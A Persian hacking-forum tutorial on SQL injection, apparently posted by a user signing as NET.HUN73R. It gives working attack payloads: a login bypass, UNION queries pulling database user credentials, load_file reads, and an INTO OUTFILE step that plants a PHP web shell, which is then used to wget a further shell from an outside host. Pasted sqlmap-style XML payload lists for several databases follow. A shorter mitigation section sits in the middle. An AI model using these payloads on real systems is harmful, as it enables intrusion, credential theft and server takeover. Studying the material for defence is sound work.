آسیب پذیری sql

[NET.HUN73R]

سلام خدمت همه دوستان

میخوام نحوه ایجاد باگsql و راه های پیدا کردن اون از روی کد رو بهتورت ساده ومبتدی بگم البته این سورا که گفته میشه خیلی سادس بقیه پرایویته

نوعی از حملات که در آن اخلاگر با

تزریق دستورات SQL

به ورودی هایی که به

پایگاه داده

منتهی می شود، اطلاعات مورد نظر را از

پایگاه داده

استخراج کرده و اهداف خود را روی آن هدف اعمال می کند.

این

آسیب پذیری

زمانی ایجاد می شود که ورودی های منتهی شده به پایگاه داده محدود نشده باشند، در نتیجه اخلالگر دستوراتی را علاوه بر دستورات و درخواست هایی که به

سرور

ارسال می شود، به پایگاه داده ارسال میکند و اطلاعات را از آن استخراج می کند.

برای درک اینکه این آسیب پذیری در عمل چگونه اتفاق می افتد، آدرس فرضی زیر را در نظر بگیرید:

www.site.com/page.php?id=5

در آدرس فرضی بالا قسمت page.php?id=5 یک Query را تشکیل می دهد که کد مربوط به آن بصورت زیر است:

<?php$sql=”SELECT * FROM logs WHERE id=”.$ GET[“id”];$result=mysql query($sql);?>

در کد بالا

Query

مورد نظر در متغیر sql قرار گرفته و متغیر

sql

از طریق تابع mysql_query اجرا می شود و در واقع نتیجه کلی در داخل متغیر result قرار می گیرد. مشکل این کد اینجاست که بدون ایجاد محدودیت، پارامتر id از طریق $_GET فراخوانی شده است.

نکته: تابع mysql_query پرس جوهایی SQL را روی پایگاه داده MYSQL اجرا می کند.

پس شکل اصلی آدرس بالا قبل از اجرای کوئری به شکل زیر است:

www.site.com/ SELECT * FROM logs WHERE id=5

و زمانی که ما در قسمت url سایت عمل تزریق را انجام می دهیم به شکل زیر می باشد:

www.site.com/SELECT * FROM logs WHERE id=5 union select null, concat(user,password) from mysql.user—

حاصل این تزریق افشای اطلاعات کاربران پایگاه داده است. البته url تنها راه انجام این حمله نیست و این حمله می تواند از طریق ورودیهایی مثل فرم و یا کوکی نیز صورت گیرد.

برای مثال:

query = "SELECT * FROM users WHERE uname=’” . $_POST[‘Username ‘]. “’ AND password=’” . $_POST[‘Password’] . “’;”

در این شبه* کد انتظار می*رود فقط هنگامی که نام* کاربری(Username) و رمزعبور(Password) به درستی وارد شوند عمل ورود به سایت انجام پذیرد، امابا یک ترفند ساده می*توان نام* کاربری را طوری وارد کرد که بدون کنترل شدن رمزعبور، عمل ورود به سایت انجام شود. کافی است به جای نام* کاربری و رمز عبور عبارت زیر را وارد کنیم:

' OR 1=1 --

در این صورت دستور SQL به صورت زیر اجرا خواهد شد:

SELECT * FROM users WHERE uname=’’ OR 1=1  --AND password=’’;

در ساختار SQL عبارات بعد از – اجرا نمی شوند و 1=1 یک عبارتهمیشه درست است، پس کاربر تائید می*شود. به این طریق بدون داشتن نام کاربری و رمزعبور و تنها با استفاده از تزریق کد SQL به پایگاه داده توانستیم وارد محیط کاربری سایت شویم.

[NET.HUN73R]

راههای کشف آسیب پذیری sql injection

بررسی کد های html

کدهای HTML صفحه اصلی و دیگر صفحات محتمل را بررسی و تست sql injection را، روی پرس و جوهایی که در قالب لینک و یا فرم ارسال داده قرار دارند انجام می دهیم.

<html>
 ...
< body >
< a href="about.php?id=2">about us</a >
<body/>
 ...
<html/>

برای مثال؛ در کدهای بالا لینکی موجود است که می تواند ناشی از یک پرس و جوی SQL باشد.

(site.com/about.php?id=2) 

بنابراین تست sql injection را انجام می دهیم.

برای انجام این کار کاراکتر هایی (مثلا کوتیشن) را در انتهای آدرس (url) قرار می دهیم و اگر با خطاهای از قبل شناخته شده مواجه شدیم نسبت به sql injection آسیب پذیر می باشد.

site.com/about.php?id=2'
site.com/about.php?id=2 and 1=1  

خطاهای شناخته شده برای موجود بودن آسیب پذیری sql injection برای پایگاه داده های مختلف به شرح زیر می باشد:

 

 

MYSQL

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server

MSSQL

Unclosed quotation mark before thecharacter string

ORACLE

ORA-01756: quoted string not properly terminal

ORA-00933: SQL command not properly ended

 

و علت وجود این خطا ها این است که ورودی منتهی شده به پایگاه داده محدود نشده و کاراکتر های ارسالی به همراه دستورات دیگر به پایگاه داده ارسال می شوند.

- استفاده از اسکنر ها

با استفاده از نرم افزارهای اسکنر موجود، می توان وب سایت های مورد نظر را اسکن نمود.

یکی از معروفترین اسکنرها Accunetix Web Vulnerability Scaner است

بررسی کدهای http واقع در سرآیند

هنگامی که با مرورگر وب سایتی باز می شود در واقع از طریق پروتکل HTTP با سرور ارتباط برقرار می شود و زمانی که درخواستی از طریق این پروتکل به وب سرور فرستاده شود فایل سرآیندی (HTTP Header) در کنار این درخواست به سرور ارسال می شود که در هنگام پاسخ سرور نیز این فایل سرآیند در کنار آن قرار می گیرد تا از صحت اتصال اطمینان به عمل آید.

هنگام اتصال به سرور فایل سرآیندی در کنار درخواست ارسالی به سرور و پاسخ های بازگشتی از سرور قرار می گیرد که این فایل سرآیند شامل فیلدهایی می باشد که یکی از آنها کد HTTP می باشد.

مثلا زمانی که سایت guardiran.org را باز شود، درخواست به سرور رفته و نتیجه آن در قالب فایل سرآیند به مرورگر باز می*گردد:

 

GET / HTTP/1.1
Host: http://guardiran.org/forums/
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:__utma=36873331.532336695.1360094362.1360094362.1360094362.1; __utmz=36873331.1360094362.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none )
Connection: keep-alive  

نتیجه برگشتی:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: friday, 022 may 2015 07:52:18 GMT
Content-Length: 5096  

در سرآیند بالا که اولی مربوط به درخواست و دومی مربوط به پاسخ سرور است،کد HTTP مربوط به پاسخ سرور٢٠٠ می باشد که یعنی درخواست به درستی دریافت شد، دو کد HTTP وجود دارد که بعد از تزریق کاراکتر به انتهای url، نشانه آسیب پذیری sql injection می باشد و آن کدهای ٣٠٢ و۵٠٠ می باشد

HTTP/1.1 500 Internal Server Error
 Date: friday, 022 may 2015 13:08:25 GMT
Server: Microsoft-IIS/6.0
 X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html;
charset=utf-8
Content-Length: 3026
 
 HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 159
Date: friday, 022 may 2015 13:42:04 GMT
Location: /index.aspx
Content-Type: text/html;
charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private  

برای این که بتوانید این سرآیندها را ببینید می توانید افزونه Live HTTP Headers را روی مرورگر فایرفاکس نصب کنید.

http://addons.mozilla.org/en/firefox/addon/live -http -headers  

بعد از نصب افزونه از قسمت Tools از آیتم های مرورگر فایرفاکس به آن دسترسی پیدا کرده و می توانید با این افزونه سرآیند را دیده، آن را آنالیز و حتی ویرایش کنید.

[NET.HUN73R]

انواع حملات تزریق کد sql به پایگاه* داده

 

واکنش هایی که پایگاه داده ها در هنگام تزریق از خود نشان می دهند باعث شده تا به مرور زمان انواع مختلفی از تزریق ها به وجود آید. ما در زیر بدلیل طولانی نشدن شرح حملهرا به بعد موکول می کنیم و تنها به معرفی انواع حملات می پردازیم.

 

الف: UNION BASED SQL INJECTION (تزریق بر اساس ترکیب دو QUERY)

نوعی از تزریق که نتایج دو دستور sql از طریق union با هم ترکیب شده و نتیجه یک جا نمایش داده می شود.

 

query.php?id=20 UNION SELECT 1,2,3,4,5
First  Query                     Second Query  

در برخی ورژن های پایگاه داده ها، مثل MYSQL ورژن 5 به بالا یک جدول اضافی به نام information_schema وجود دارد که تمام اطلاعات سیستمی از جمله نام تمام جداول و ستون ها در آن یافت می شود که در سرعت بخشیدن به استخراج اطلاعات کمک شایانی می کند، زیرا زمانی که به کمک جدول information_schema از وجود جدولی با نام admin که دارای دو ستون passwo

rd, username است مطلع بود، تنها کاری که لازم است انتخاب داده های جدول و نمایش محتوای آنهاست

ب: ERROR –BASED SQL INJECTION (تزریق بر اساس خطا)

نوعی از تزریق که عمل تزریق با توجه به خطاهایی که پایگاه داده می دهد طوری انجام می شود که اطلاعات استخراج شود و روال کار به این شکل است که دستوراتی را تزریق می کنیم تا نام ستون و جداول در قالب خطا نمایش داده شود و سپس می توانیم در ادامه تزریق از اطلاعات آنها استفاده کنیم.

ج: BLIND- BASED SQL INJECTION (تزریق کور)

در این نوع تزریق هیچ اطلاعات یا خطایی از طرف پایگاه داده نمایش داده نمی شود و هکر فقط از طریق پاسخ های True/False که از پایگاه داده دریافت می کند، نتایج را حدس می زند.

از لحاظ تقسیم بندی تزریق کور خود به دو دسته قابل تقسیم است:

1- Boolean Based : نتایج به شکل True/False می باشد.

2- Time Based: نتایج به شکل True/False مبتنی بر زمان می*باشد.

در هنگام تزریق اگر صفحه وب سایت به درستی نمایش داده شود دستور تزریق شده صحیح(True) و اگر درست نمایش داده نشود غلط(False) می باشد.

در هنگام تزریق اگر وب سایت بعد از تاخیر تعیین شده با استفاده از توابع تاخیر (مثلا 2 ثانیه) لود شود شرط صحیح(True) و درغیر اینصورت غلط(False) می باشد.

- خواندن فایل و ساخت فایل با SQL INJECTION

برخی توابع در sql این امکان را به ما می دهند تا بتوانیم فایلی از سیستم را خوانده یا فایل دلخواه خود را داخل سرور آپلود کنیم.

site/index.php?id=-7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, load_file(/home/buscocas/www/login.php),29-- 

نتیجه این مثال این است که کدهای فایل php در صفحه وب سایت نمایش داده شود و اگر با خطا مواجه شد می توان مسیر فایل را به صورت hex کد گذاری کرد.

site/index.php?id=-7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, load_file(0x2f686f6d652f627573636f6361732f7777772f6c6f67696e2e706870),29--  

عمل ایجاد فایل هم با دستورات sql امکان پذیر می باشد:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO OUTFILE '/var/www/cmd.php'--

اگر خطایی رخ داد مسیر را با استفاده از hex کدگذاری می کنیم:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO OUTFILE '0x2f7661722f7777772f636d642e706870'--

تا اینجا یک فایل با نام cmd.php ساخته شده که امکان اجرای خط فرمان با آن است که برای اجرای آن از آدرس زیر استفاده می کنیم:

http://Site.com/cmd.php?cmd=ls

با این کد لیست فایل های موجود در قسمت root سایت نمایش داده می شود، حال می توانیم از طریق این خط فرمان شل یا فایل مورد نظر را روی هاست دانلود کنیم.

http://Site.com/shell.php?cmd=wget'>http://Site.com/shell.php?cmd=wget
http://mysite.com/shell.php 

در اینجا فایل php از مسیری که تعیین شده روی host دانلود شده و می*توان آن را اجرا کرد.

http://Site.com/shell.php 

نکته: تابع LOAD_FILE() برای خواندن و فراخوانی فایل های موجود مورد استفاده قرار می گیرد.

نکته: از طریق into outfile می توان محتویات X را داخل فایل تعیین شده ایجاد کرد.

SELECT X INTO OUTFILE 'test.php'

[NET.HUN73R]

راه های مقابله با تزریق کد

برای جلوگیری از انجام چنین اتفاقاتی برای زبان*های برنامه*نویسی مختلف،راهکارهای گوناگونی وجود دارد که در ادامه با آنها آشنا می*شوید.

در ابتدا و در طراحی و استفاده از پایگاه داده این دو نکته را مد نظر قرار دهید:

1- تا حد امکان از کاربرانی با سطح دسترسی کم برای اتصال به پایگاه دادهاستفاده کنید. این کار باعث جلوگیری از SQL Injection نمی*شود اما به اینموضوع کمک می*کند که کسی نتواند کدهای مخرب را روی بانک اطلاعاتی اجرا کند وبنابراین در صورت وجود SQL Injection نفوذگر قدرت مانور کمتری خواهد داشت.

2- همیشه اطلاعات مهم مانند رمزهای عبور را به صورت کدشده در پایگاهداده(Database) ذخیره کنید. این کار نیز باعث جلوگیری از SQL Injection نمی*شود اما باعث می*شود در صورتی که مهاجم به پایگاه داده نفوذ کرد،نتواند اطلاعاتی مانند رمزهای عبور را به راحتی به دست بیاورد.

3- سعی کنید دستورات اجرا شده در پایگاه داده را ثبت کنید. هر چند این امر به جلوگیری از SQL Injection کمکی نمی*کند، اما به شما این امکان را می*دهد تا با دیدن دستورات اجرا شده پی به اشتباهات خود برده و آنها را برطرف کنید. برای ثبت دستورات می*توانید از پایگاه*داده*هایی که این قابلیت را دارند استفاده یا با بهره* گیری از دستورات زبان برنامه نویسی که استفاده می کنید آنها را درجایی امن ذخیره کنید.

- جلوگیری از SQL INJECTION در PHP

1- همیشه از درستی نوع متغیر ورودی اطمینان حاصل کنید. در زبان PHP انواع متغیرها وجود دارند. می*توانید با استفاده از توابعی مانند ctype_digit و ctype_alnum و سایر توابع خانواده ctype یا تابع gettype نوع ورودی را کنترل کنید. همچنین می*توانید با استفاده از (regular expression (PCRE از صحت اطلاعات اطمینان حاصل* یابید.

2- اگر قرار است در دستور SQL عدد وارد شود، با توابعی مانند is_numeric اطمینان حاصل کنید که ورودی حتما عدد است یا همیشه نوع ورودی را با تابعی مانند settype یا intval یا floatval یا … تغییر دهید.

3- ورودی*هایی که از نوع رشته (string) هستند را با توابع پایگاه داده مورد نظر escape کنید (مانند mysql_real_escape_string یا sqlite_escape_string یا ...) و اگر برای پایگاه داده مورد نظر شما چنین تابعی موجود نیست با استفاده از توابعی مانند addslashes یا str_replace این کار را انجام دهید. این عمل باعث می*شود تا کاراکتری مانند ' در ساختار SQL تاثیری نگذارد و ورودی به عنوان متغیر به دستور داده شود و تاثیری بر دستور نداشته *باشد.

4- استفاده از stored procedures یکی از بهترین روش*های جلوگیری از SQL Injection در پایگاه داده*هایی است که این قابلیت را دارند. اما متاسفانه همه پایگاه*داده*ها این قابلیت را ندارند.

5- سعی کنید در هیچ شرایطی خطای رخ داده در پایگاه داده به کاربر نشان داده نشود، چراکه نمایش این خطاها می*تواند به حمله*کننده این امکان را بدهد که بداند چه اتفاقی در پایگاه داده انجام گرفته است. در PHP راه*های مختلفی برای جلوگیری از نمایش خطاها وجود دارد. یکی از معروف*ترین آنها استفاده از عملگر @ قبل از دستورالعمل مورد نظر است. هنگامی که از این عملگر استفاده شود، PHP از پیام*های خطای دستور مورد نظر صرف نظر می*کند. یک نمونه استفاده از عملگر:

$my_file=@file (‘names.php’) or die (‘failed’); 

-جلوگیری از SQL INJECTION در ASP.NET

1- از ورودی*ها اطمینان حاصل کنید. سعی کنید تا جای ممکن تمامی ورودی*ها را از لحاظ نوع داده، طول رشته، بازهعددی و سایر موارد کنترل کنید. برای این کار می*توانید از Regex ،RegularExpressionValidator یا RangeValidator استفاده کنید.

2- استفاده از ورودی*ها در Stored Procedureها راه بسیار مناسبی است. توجه داشته باشید که استفاده از Stored Procedure ها بدون استفاده از ورودیباعث جلوگیری از SQL Injection نمی*شود. برای این کار می*توانیداز SqlParameter و SqlParameterCollection استفاده کنید.

همچنین درصورتی که مجبور به استفاده از دستورات پویا (Dynamic) هستید، بااستفاده از SqlParameterCollection نوع ورودی*ها را مشخص کنید.

3- سعی کنید تا جای ممکن از API هایی مانند ADO.Net و قابلیت*های آناستفاده کنید، چرا که با کمک این رابط*های برنامه*نویسی می*توان نوع دقیقداده*ها را مشخص کرد و همچنین این اطمینان را داشت که ورودی*ها به طرزصحیحی Escape می*شوند.

مثال: در نمونه کد با کمک روش*های گفته شده تا حد امکان جلوی این حفره گرفته شده است:

<%@ language=”C#‎‎‎‎‎‎‎‎” %>
 using System;
usingSystem.Text.RegularExpressions;
public void Login(string uname, string password)
}
if ( !Regex.IsMatch(uname, @"^[a-zA-Z'./s]{1,20}$"))
throw new FormatException("Invalid username");
if ( !Regex.IsMatch(password,@"^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{6,15}$" ))
throw new FormatException("Invalid password"); 
}
usingSystem.Data;
usingSystem.Data.SqlClient; 
using (SqlConnection connection = new SqlConnection(connectionString))
{
DataSet dataset = new DataSet();
SqlDataAdapter command = new SqlDataAdapter ("LoginStoredProce dure", connection);
command.SelectCommand.CommandType = CommandType.StoredProcedure;
command.SelectCommand.Parameters.Add("@au_id", SqlDbType.VarChar, 11);
command.SelectCommand.Parameters["@au_id"].Value = SSN.Text;
command.Fill(dataset);
}  

[NET.HUN73R]

inline_query paylod

<?xml version="1.0" encoding="UTF-8"?>
<root>    <!-- Inline queries tests -->    <test>        <title>MySQL inline queries</title>        <stype>3</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,8</clause>        <where>3</where>        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>        <request>            <!-- These work as good as ELT(), but are longer            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>            -->            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>        </request>        <response>            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL inline queries</title>        <stype>3</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,8</clause>        <where>3</where>        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>        <request>            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>        </request>        <response>            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase inline queries</title>        <stype>3</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3,8</clause>        <where>3</where>        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>        <request>            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>        </request>        <response>            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Oracle inline queries</title>        <stype>3</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,8</clause>        <where>3</where>        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>        <request>            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>        </request>        <response>            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>SQLite inline queries</title>        <stype>3</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,8</clause>        <where>3</where>        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>        <request>            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>        </request>        <response>            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>        </response>        <details>            <dbms>SQLite</dbms>        </details>    </test>
    <test>        <title>Firebird inline queries</title>        <stype>3</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,8</clause>        <where>3</where>        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>        <request>            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>        </request>        <response>            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>        </response>        <details>            <dbms>Firebird</dbms>        </details>    </test>    <!-- End of inline queries tests --></root>

[NET.HUN73R]

stacked_queries paylod

<?xml version="1.0" encoding="UTF-8"?>
<root>    <!-- Stacked queries tests -->    <test>        <title>MySQL > 5.0.11 stacked queries (SELECT - comment)</title>        <stype>4</stype>        <level>1</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>> 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL > 5.0.11 stacked queries (SELECT)</title>        <stype>4</stype>        <level>2</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>> 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL > 5.0.11 stacked queries (comment)</title>        <stype>4</stype>        <level>2</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>        <request>            <payload>;SELECT SLEEP([SLEEPTIME])</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>> 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL > 5.0.11 stacked queries</title>        <stype>4</stype>        <level>3</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>        <request>            <payload>;SELECT SLEEP([SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>> 5.0.11</dbms_version>        </details>    </test>
    <test>        <title>MySQL < 5.0.12 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>2</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>        <request>            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>            <comment>#</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL < 5.0.12 stacked queries (heavy query)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>        <request>            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 stacked queries (comment)</title>        <stype>4</stype>        <level>1</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL > 8.1 stacked queries</title>        <stype>4</stype>        <level>4</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>> 8.1</dbms_version>        </details>    </test>
    <test>        <title>PostgreSQL stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>2</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>        </details>    </test>
    <test>        <title>PostgreSQL < 8.2 stacked queries (Glibc - comment)</title>        <stype>4</stype>        <level>3</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>< 8.2</dbms_version>            <os>Linux</os>        </details>    </test>
    <test>        <title>PostgreSQL < 8.2 stacked queries (Glibc)</title>        <stype>4</stype>        <level>5</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>        <request>            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>PostgreSQL</dbms>            <dbms_version>< 8.2</dbms_version>            <os>Linux</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase stacked queries (comment)</title>        <stype>4</stype>        <level>1</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>        <request>            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase stacked queries</title>        <stype>4</stype>        <level>4</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>        <request>            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>        <stype>4</stype>        <level>1</level>        <risk>1</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>        <request>            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
